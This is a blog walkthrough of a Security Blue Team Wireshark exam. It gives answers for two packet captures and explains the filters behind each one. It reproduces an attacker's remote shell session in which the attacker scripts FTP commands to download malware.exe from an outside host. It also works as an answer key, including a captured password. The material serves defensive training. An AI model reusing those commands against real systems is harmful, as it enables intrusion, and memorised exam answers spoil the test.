Skip to main content
HashnodeJoseph Chisom Ofonagoro

Command Palette

Search for a command to run...

Security Blue Team Wireshark Exam Walkthrough

Updated
11 min read
Security Blue Team Wireshark Exam Walkthrough
J
Joseph Chisom Ofonagoro

Hi there! I am a curious techie. My spare time is spent with books.

Introduction

I recently wrote and passed the Wireshark exam from the Security Blue Team with a 9/9 mark.

This was part of my Networking sub-path.

It was a deeply practical experience from A to Z, as I had to work with two Wireshark PCAP files.

It tested my knowledge of core networking itself, display filters, packet statistics, critical thinking, and investigation of networking depths.

For instance, one of the questions asked for a password embedded into a network packet; my knowledge of network protocols allowed me to filter for protocols that allowed clear-text communications, where I found the answer.

As is typical of me and my knack for documentation, I documented the entire process and the answers to each question. Yes, I was that confident!😀

I not only wrote down the answers to the Wireshark questions, but also explained the logic behind them; not doing that would be a great disservice to whoever finds it.

This is to ensure that when you are stuck and go through my solution, you not only find an answer, but can explain it, understand it, and reverse engineer the process like it were a textbook on Wireshark:

This is the documentation, and I hope you found it useful. If you did, do use the comments to let me know, I will be happy to hear from you.

Question One: PCAP1 - Which protocol was used over port 3942?

As seen from the screenshot, to find an answer for this, I used the common display filter used to search for port numbers: tcp.port==3942. But this returned nothing, so I switched to the second protocol, UDP.

Using UDP, I searched for udp.port==3942, and this returned five packets, all with the SSDP protocol, indicating that UDP port 3942 was used over SSDP.

Answer: SSDP

Question Two: PCAP1 - What is the IP Address of the host that was pinged twice?

This can easily fool you into choosing 92.168.1.7, what is most obvious, but you MUST check for successful pings, as that is what counts.

Looking carefully, we can see that there are four packets with consistent success, and when we investigate the host, which is what the question asks of by double-clicking on each of the packets, we find the IP address of 8.8.4.4 a host that was pinged twice.

All I had to do was input icmp into the filter field, then look.

Answer: 8.8.4.4

Question Three: PCAP1 - How many DNS query response packets were captured?

For this, I used the dns.flags.response==1 display filter. Getting this right means that you must know what that filter does.

Our question is asking for the number of RESPONSE packets, and the response==1 when used in any filter is actually telling Wireshark to only show packets where the response equals 1, or in other words, equals a successful response.

Typing in the filter dns.flags.response==1 will display a total of 90 packets.

Answer: 90

Question Four: PCAP1 - What is the IP address of the host which sent the most number of bytes?

Statistics time!

You don’t need a filter for this. Just click on the statistics option, click on endpoint, then click on the IPV4 tab because we are looking for IPV4 addresses.

This too is a tricky question, but when you analyze the question, it is requesting a BYTE amount, and an understanding of Tx and Rx bytes will help you to know what to answer.

Tx bytes is the total number of bytes SENT.

Rx bytes is the total number of bytes RECEIVED.

Now, you see? We are judging by Tx bytes as seen from my screenshot below.

Answer: 115.178.9.18

Now, we switch to the second PCAP, and the questions become a bit tougher.

Question Five: PCAP2 - What is the WebAdmin password?

Well, run an http contains "WebAdmin" to see packets with WebAdmin in them.

The logic is rooted in the fact that we wouldn’t be asked for a password unless it was already in plaintext, so I had to use the protocols I knew allowed plaintext communication. FTP, HTTP. http clicked, and on following the http stream, I saw the password, in PLAINTEXT!

Answer: sbt123

Question Six: PCAP2 - What is the version number of the attacker’s FTP server?

We are looking at an FTP server, and its version number. Since FTP sends messages in plaintext, I typed in ftp into my filter field and saw what looked like a version number, alongside the FTP server’s name.

Looks simple, but you need to understand networking and its protocols to be able to understand this.

Answer: 1.5.5

Question Seven: PCAP2 - Which port was used to gain access to the victim Windows host?

Yoo, some hacking time.

Well, I won’t lie, I got stuck here for some time, longer than other questions, but later realized that it was simple: The default shell for Windows is CMD or PowerShell, and hackers love it. So, if it were a remote access, I guess they did it over a transport layer protocol, TCP or UDP.

And then, I did: tcp contains "cmd"This gave me just two packets. Following them both, I saw something fishy, which made me dig deeper by following the TCP stream of the first, and saw command execution! Whoa, that’s good evidence.

I went back, checked the port over which that happened, and got port 8081.

Answer: 8081

So, when I followed the TCP stream, I got this shell execution:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser>
cd Desktop

cd Desktop

C:\Users\IEUser\Desktop>
dir

dir
Volume in drive C is Windows 7
Volume Serial Number is 3C9E-098B

Directory of C:\Users\IEUser\Desktop

02/08/2020  04:07 PM    <DIR>          .
02/08/2020  04:07 PM    <DIR>          ..

09/16/2019  05:22 PM                 0 .lock
08/22/2019  04:59 AM            30,000 BOF.m3u
04/20/1997  03:43 PM             9,728 CODBCLog.dll
12/04/1995  02:08 PM            27,136 Ctl3d32.dll.nt
01/31/1996  01:28 PM            26,624 Ctl3d32.dll.Win95
08/20/2019  01:40 AM             1,041 Easy RM to MP3 Converter.lnk
08/22/2019  04:59 AM               107 EasyRM.py
02/08/2020  03:44 PM               379 Employee_Information_CONFIDENTIAL.txt
01/02/2018  05:21 PM               830 eula.lnk
08/16/2019  06:38 PM             2,347 faq.html
09/13/2019  04:41 PM               961 FreeSSHd.lnk
07/16/2019  04:50 AM                64 FtpDaemon.dat
09/16/2019  05:22 PM             1,220 FtpDaemon.ini
02/08/2020  04:08 PM                89 ftp_cmd.txt
10/05/2019  06:32 PM            61,440 good-nc.exe
08/16/2019  06:38 PM             6,197 howto.html
08/16/2019  06:42 PM               327 log.txt
06/18/1996  05:19 PM             3,072 log.wav
07/16/2019  04:51 AM               585 LogFile.log
06/18/1996  05:18 PM             6,248 login.wav
09/13/1996  10:47 AM         1,013,520 Mfc42.dll
08/16/2019  06:38 PM             4,453 mimetypes.ini
08/16/2019  06:38 PM             2,030 minishare.css
08/16/2019  06:38 PM            64,512 minishare.exe
08/16/2019  06:38 PM               261 minishare.ini
08/16/2019  06:46 PM               990 MiniShare.lnk
08/16/2019  06:38 PM                93 motd.txt
06/18/1996  05:12 PM             7,348 msg.wav
08/03/1996  02:00 AM            74,752 Msvcirt.dll
08/03/1996  02:00 AM           267,536 Msvcrt.dll
06/14/1996  07:50 PM            65,024 Msvcrt40.dll
07/16/2019  04:50 AM                83 ODBClog.ini
07/16/2019  04:50 AM                92 ODBClog.log
06/19/1996  04:21 PM            76,048 Olepro32.dll
07/14/1996  10:48 AM             1,496 ProcessZip.cpp
04/19/1997  01:26 PM            41,472 ProcessZip.exe
08/16/2019  06:38 PM               615 readme (2).txt
02/13/1997  01:17 AM             6,295 ReadMe.txt
04/24/1997  04:15 PM            72,436 ReleaseNotes.txt
04/19/1997  02:06 PM           228,352 Setup.exe
04/24/1997  04:16 PM             2,398 Setup.inf
08/22/2019  04:51 AM               185 SocketServer.py
12/11/2019  01:31 AM    <DIR>          source
04/24/1997  11:57 AM                91 sysmsg9.txt
01/26/1997  09:22 AM            35,328 uninstall.exe
04/30/1996  11:06 AM           126,464 unzip.exe
10/05/2019  06:24 PM             1,412 vbscript-wget.txt
08/16/2019  06:38 PM             8,362 version.txt
10/20/1996  10:59 AM             1,508 war-ftpd.cnt
04/24/1997  04:11 PM           388,608 war-ftpd.exe
04/24/1997  04:10 PM         4,292,866 War-ftpd.hlp
10/05/2019  06:31 PM               968 wget.vbs
08/12/2019  11:01 PM    <DIR>          Win32
08/12/2019  11:01 PM    <DIR>          WinCE_ARMV4I
08/12/2019  11:01 PM    <DIR>          WinCE_X86
              51 File(s)      6,963,993 bytes
              6 Dir(s)  24,042,721,280 bytes free

C:\Users\IEUser\Desktop>
echo "open 192.168.56.1" > 1.txt

echo "open 192.168.56.1" > 1.txt

C:\Users\IEUser\Desktop>
echo "USER anonymous" >> 1.txt

echo "USER anonymous" >> 1.txt

C:\Users\IEUser\Desktop>
echo "PASS anonymous" >> 1.txt

echo "PASS anonymous" >> 1.txt

C:\Users\IEUser\Desktop>
echo "binary" >> 1.txt

echo "binary" >> 1.txt

C:\Users\IEUser\Desktop>
echo "GET malware.exe" >> 1.txt

echo "GET malware.exe" >> 1.txt

C:\Users\IEUser\Desktop>
echo "bye" >> 1.txt

echo "bye" >> 1.txt

C:\Users\IEUser\Desktop>
ftp -v -n -s:1.txt

ftp -v -n -s:1.txt
Invalid command.
Invalid command.
Invalid command.
Not connected.
Invalid command.
"open 192.168.56.1"
"USER anonymous"
"PASS anonymous"
"binary"
"GET malware.exe"
"bye"

C:\Users\IEUser\Desktop>
ftp -A 192.168.56.1

ftp -A 192.168.56.1
Anonymous login succeeded for IEUser@IEWIN7

binary
GET malware.exe
bye


C:\Users\IEUser\Desktop>
dir

dir
Volume in drive C is Windows 7
Volume Serial Number is 3C9E-098B

Directory of C:\Users\IEUser\Desktop

02/08/2020  04:14 PM    <DIR>          .
02/08/2020  04:14 PM    <DIR>          ..

09/16/2019  05:22 PM                 0 .lock
02/08/2020  04:13 PM                99 1.txt
08/22/2019  04:59 AM            30,000 BOF.m3u
04/20/1997  03:43 PM             9,728 CODBCLog.dll
12/04/1995  02:08 PM            27,136 Ctl3d32.dll.nt
01/31/1996  01:28 PM            26,624 Ctl3d32.dll.Win95
08/20/2019  01:40 AM             1,041 Easy RM to MP3 Converter.lnk
08/22/2019  04:59 AM               107 EasyRM.py
02/08/2020  03:44 PM               379 Employee_Information_CONFIDENTIAL.txt
01/02/2018  05:21 PM               830 eula.lnk
08/16/2019  06:38 PM             2,347 faq.html
09/13/2019  04:41 PM               961 FreeSSHd.lnk
07/16/2019  04:50 AM                64 FtpDaemon.dat
09/16/2019  05:22 PM             1,220 FtpDaemon.ini
02/08/2020  04:08 PM                89 ftp_cmd.txt
10/05/2019  06:32 PM            61,440 good-nc.exe
08/16/2019  06:38 PM             6,197 howto.html
08/16/2019  06:42 PM               327 log.txt
06/18/1996  05:19 PM             3,072 log.wav
07/16/2019  04:51 AM               585 LogFile.log
06/18/1996  05:18 PM             6,248 login.wav
02/08/2020  04:14 PM            73,802 malware.exe
09/13/1996  10:47 AM         1,013,520 Mfc42.dll
08/16/2019  06:38 PM             4,453 mimetypes.ini
08/16/2019  06:38 PM             2,030 minishare.css
08/16/2019  06:38 PM            64,512 minishare.exe
08/16/2019  06:38 PM               261 minishare.ini
08/16/2019  06:46 PM               990 MiniShare.lnk
08/16/2019  06:38 PM                93 motd.txt
06/18/1996  05:12 PM             7,348 msg.wav
08/03/1996  02:00 AM            74,752 Msvcirt.dll
08/03/1996  02:00 AM           267,536 Msvcrt.dll
06/14/1996  07:50 PM            65,024 Msvcrt40.dll
07/16/2019  04:50 AM                83 ODBClog.ini
07/16/2019  04:50 AM                92 ODBClog.log
06/19/1996  04:21 PM            76,048 Olepro32.dll
07/14/1996  10:48 AM             1,496 ProcessZip.cpp
04/19/1997  01:26 PM            41,472 ProcessZip.exe
08/16/2019  06:38 PM               615 readme (2).txt
02/13/1997  01:17 AM             6,295 ReadMe.txt
04/24/1997  04:15 PM            72,436 ReleaseNotes.txt
04/19/1997  02:06 PM           228,352 Setup.exe
04/24/1997  04:16 PM             2,398 Setup.inf
08/22/2019  04:51 AM               185 SocketServer.py
12/11/2019  01:31 AM    <DIR>          source
04/24/1997  11:57 AM                91 sysmsg9.txt
01/26/1997  09:22 AM            35,328 uninstall.exe
04/30/1996  11:06 AM           126,464 unzip.exe
10/05/2019  06:24 PM             1,412 vbscript-wget.txt
08/16/2019  06:38 PM             8,362 version.txt
10/20/1996  10:59 AM             1,508 war-ftpd.cnt
04/24/1997  04:11 PM           388,608 war-ftpd.exe
04/24/1997  04:10 PM         4,292,866 War-ftpd.hlp
10/05/2019  06:31 PM               968 wget.vbs
08/12/2019  11:01 PM    <DIR>          Win32
08/12/2019  11:01 PM    <DIR>          WinCE_ARMV4I
08/12/2019  11:01 PM    <DIR>          WinCE_X86
              53 File(s)      7,037,894 bytes
              6 Dir(s)  24,042,643,456 bytes free

C:\Users\IEUser\Desktop>
exit

Question Eight: PCAP 2 - What is the name of a confidential file that is on the Windows host?

Since our attacker tried to know every file in the victim’s computer, I searched for anything having ‘confidential’ in it using CTRL + F as I was using a Windows computer.

Answer: Employee_Information_CONFIDENTIAL.txt

Question Nine: PCAP2 - What is the name of the log file that was created at 4:51 AM on the Windows host?

Same CTRL + F on the TCP stream, I found this:

Actually, I used the time to search, making it faster for me.

Answer: LogFile.log

Well, you see why knowledge of IT is essential in cybersecurity? All I needed to know was that since the attacker listed all files in the victim’s device, I just needed to scan them using CTRL + F or CMD + F.

Conclusion

Kindly refrain from copying and pasting this. I went through the extra of explaining my logic, so you can actually understand this.

If you have a question, you can comment on it below, or send me a message on X

Thank you!

#btja#wireshark#sbt

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

Joseph Chisom Ofonagoro

29 posts

Wireshark Exam Guide for Blue Teams